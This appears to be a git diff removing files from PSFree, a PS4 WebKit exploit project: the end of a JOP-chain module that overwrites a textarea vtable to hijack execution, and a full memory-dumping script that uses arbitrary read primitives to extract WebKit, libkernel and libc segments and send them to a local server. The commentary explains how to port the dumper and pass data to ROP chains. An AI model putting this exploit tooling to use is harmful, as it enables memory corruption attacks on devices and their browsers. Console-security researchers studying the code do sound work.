-        // change vtable
-        this.webcore_ta.write64(0, get_view_vector(this.vtable));
-        // jump to JOP chain
-        this.textarea.scrollLeft;
-        // restore vtable
-        this.webcore_ta.write64(0, this.old_vtable_p);
-    }
-}
-export const Chain = Chain900;
-
-export function init(Chain) {
-    [libwebkit_base, libkernel_base, libc_base] = get_bases();
-
-    init_gadget_map(gadgets, webkit_gadget_offsets, libwebkit_base);
-    init_gadget_map(gadgets, libc_gadget_offsets, libc_base);
-    init_gadget_map(gadgets, libkernel_gadget_offsets, libkernel_base);
-    init_syscall_array(syscall_array, libkernel_base, 300 * KB);
-    log('syscall_array:');
-    log(syscall_array);
-    Chain.init_class(gadgets, syscall_array);
-}
-
-log('Chain900');
diff --git a/psfree/send.mjs b/psfree/send.mjs
deleted file mode 100644
index 508700e..0000000
--- a/psfree/send.mjs
+++ /dev/null
@@ -1,231 +0,0 @@
-/* Copyright (C) 2024-2025 anonymous
-
-This file is part of PSFree.
-
-PSFree is free software: you can redistribute it and/or modify
-it under the terms of the GNU Affero General Public License as
-published by the Free Software Foundation, either version 3 of the
-License, or (at your option) any later version.
-
-PSFree is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-GNU Affero General Public License for more details.
-
-You should have received a copy of the GNU Affero General Public License
-along with this program.  If not, see .  */
-
-// script for dumping libSceNKWebKit.sprx, libkernel_web.sprx, and
-// libSceLibcInternal.sprx
-
-// This script is for firmware 8.0x. You need to port this to your firmware if
-// you want to use it. It only dumps the .text and PT_SCE_RELRO segments. It
-// doesn't dump the entire ELF file.
-//
-// There's also some miscellaneous functions to dump functions from WebKit that
-// were studied during the development of PSFree.
-
-// libkernel libraries contain syscalls
-// syscalls are enforced to be called from these libraries
-//
-// libkernel_web.sprx is used by the browser in firmwares >= 6.00
-// libkernel.sprx for firmwares below
-//
-// libkernel_sys.sprx contains syscalls that aren't found in the others, such
-// as mount and nmount
-//
-// the BD-J app uses libkernel_sys.sprx for example
-
-// Porting HOWTO:
-//
-// You can only dump the WebKit module (libSceNKWebKit.sprx for FW >= 6.00,
-// else libSceWebkit2.sprx) initially via dump_libwebkit() on any firmware.
-// We'll use the WebKit dump to search for imported functions from libkernel
-// and LibcInternal. Once we resolve the imports, we can use find_base() to get
-// the boundaries of these modules.
-//
-// Most of the work is done for you at dump_lib*(). You just need to find the
-// offset of the imported functions relative to WebKit's base address.
-//
-// import candidates:
-//
-// __stack_chk_fail() is a good import from libkernel to search for as it's
-// easy to find since most functions are protected by a stack canary.
-//
-// For a LibcInternal import we searched for strlen() but you can search for
-// any libc function such as memcpy().
-
-import * as config from './config.mjs';
-
-import { Int } from './module/int64.mjs';
-import { Addr, mem } from './module/mem.mjs';
-import { make_buffer, find_base, resolve_import } from './module/memtools.mjs';
-import { KB, MB } from './module/offset.mjs';
-
-import {
-    log,
-    align,
-    die,
-    send,
-} from './module/utils.mjs';
-
-import * as rw from './module/rw.mjs';
-import * as o from './module/offset.mjs';
-
-const origin = window.origin;
-const port = '8000';
-const url = `${origin}:${port}`;
-
-const textarea = document.createElement('textarea');
-// JSObject
-const js_textarea = mem.addrof(textarea);
-
-// boundaries of the .text + PT_SCE_RELRO portion of a module
-function get_boundaries(leak) {
-    const lib_base = find_base(leak, true, true);
-    const lib_end = find_base(leak, false, false);
-
-    return [lib_base, lib_end]
-}
-
-// dump a module's .text and PT_SCE_RELRO segments only
-function dump(name, lib_base, lib_end) {
-    // assumed size < 4GB
-    const lib_size = lib_end.sub(lib_base).lo;
-    log(`${name} base: ${lib_base}`);
-    log(`${name} size: ${lib_size}`);
-    const lib = make_buffer(
-        lib_base,
-        lib_size
-    );
-    send(
-        url,
-        lib,
-        `${name}.sprx.text_${lib_base}.bin`,
-        () => log(`${name} sent`)
-    );
-}
-
-// dump for libSceNKWebKit.sprx
-function dump_libwebkit() {
-    let addr = js_textarea;
-    // WebCore::HTMLTextAreaElement
-    addr = addr.readp(0x18);
-
-    // vtable for WebCore::HTMLTextAreaElement
-    // in PT_SCE_RELRO segment (p_type = 0x6100_0010)
-    addr = addr.readp(0);
-
-    log(`vtable: ${addr}`);
-    const vtable = make_buffer(addr, 0x400);
-    send(url, vtable, `vtable_${addr}.bin`, () => log('vtable sent'));
-
-    const [lib_base, lib_end] = get_boundaries(addr);
-    dump('libSceNKWebKit', lib_base, lib_end);
-
-    return lib_base;
-}
-
-// dump for libkernel_web.sprx
-function dump_libkernel(libwebkit_base) {
-    const offset = 0x8d8;
-    const vtable_p = js_textarea.readp(0x18).readp(0);
-    // __stack_chk_fail
-    const stack_chk_fail_import = libwebkit_base.add(offset);
-
-    const libkernel_leak = resolve_import(stack_chk_fail_import);
-    log(`__stack_chk_fail import: ${libkernel_leak}`);
-
-    const [lib_base, lib_end] = get_boundaries(libkernel_leak);
-    dump('libkernel_web', lib_base, lib_end);
-}
-
-// dump for libSceLibcInternal.sprx
-function dump_libc(libwebkit_base) {
-    const offset = 0x918;
-    const vtable_p = js_textarea.readp(0x18).readp(0);
-    // strlen
-    const strlen_import = libwebkit_base.add(offset);
-
-    const libc_leak = resolve_import(strlen_import);
-    log(`strlen import: ${libc_leak}`);
-
-    const [lib_base, lib_end] = get_boundaries(libc_leak);
-    dump('libSceLibcInternal', lib_base, lib_end);
-}
-
-function dump_webkit() {
-    const libwebkit_base = dump_libwebkit();
-    dump_libkernel(libwebkit_base);
-    dump_libc(libwebkit_base);
-}
-
-// See globalFuncEval() from
-// WebKit/Source/JavaScriptCore/runtime/JSGlobalObjectFunctions.cpp at PS4
-// 8.03.
-//
-// Used to dump the implementation of eval() to figure out the expression
-// "execState.argument(0)".
-//
-// eval()'s native function receives a JSC::ExecState pointer (renamed to
-// JSC::CallFrame on webkitgtk 2.34.4). That type has an argument() method
-// which takes an index and returns the corresponding JSValue passed to eval(),
-// e.g. execState.argument(0) is the first JSValue argument.
-//
-// execState.argument(0) evaluates to *(&execState + argumentOffset + 0).
-// Knowing the argumentOffset is useful for passing data to ROP chains.
-// argumentOffset is 0x30 for PS4 8.03.
-//
-// The PS4 uses the System V ABI. The ExecState pointer is passed to the rdi
-// register since it is the first argument. ROP chains can get the JSValue
-// passed via *(rdi + 0x30).
-//
-// For example, the expression "eval(1)" has the JSValue encoding of 1 passed
-// to *(rdi + 0x30).
-function dump_eval() {
-    let addr = js_textarea;
-    // WebCore::HTMLTextAreaElement
-    addr = addr.readp(0x18);
-
-    // vtable for WebCore::HTMLTextAreaElement
-    // in PT_SCE_RELRO segment (p_type = 0x6100_0010)
-    addr = addr.readp(0);
-
-    const libwebkit_base =  find_base(addr, true, true);
-    const impl = mem.addrof(eval).readp(0x18).readp(0x38);
-    const offset = impl.sub(libwebkit_base);
-    send(
-        url,
-        make_buffer(impl, 0x800),
-        `eval_dump_offset_${offset}.bin`,
-        () => log('sent')
-    );
-}
-
-// Initially we just used the vtable offset from pOOBs4 (0x1c8) and tested if
-// it works. It did but let's add this dumper so we can verify it another way.
-// See howto_code_exec.txt about code execution via the vtable of a textarea
-// element.
-function dump_scrollLeft() {
-    let proto = Object.getPrototypeOf(textarea);
-    proto = Object.getPrototypeOf(proto);
-    proto = Object.getPrototypeOf(proto);
-
-    const scrollLeft_get =
-        Object.getOwnPropertyDescriptors(proto).scrollLeft.get
-    ;
-
-    // get the JSCustomGetterSetterFunction
-    const js_func = mem.addrof(scrollLeft_get);
-    const getterSetter = js_func.readp(0x28);
-    const getter = getterSetter.readp(8);
-
-    const libwebkit_base = find_base(getter, true, true);
-    const offset = getter.sub(libwebkit_base);
-    send(
-        url,
-        make_buffer(getter, 0x800),
-        `scrollLeft_getter_dump_offset_${offset}.bin`,
-        () => log('sent')
-    );
-}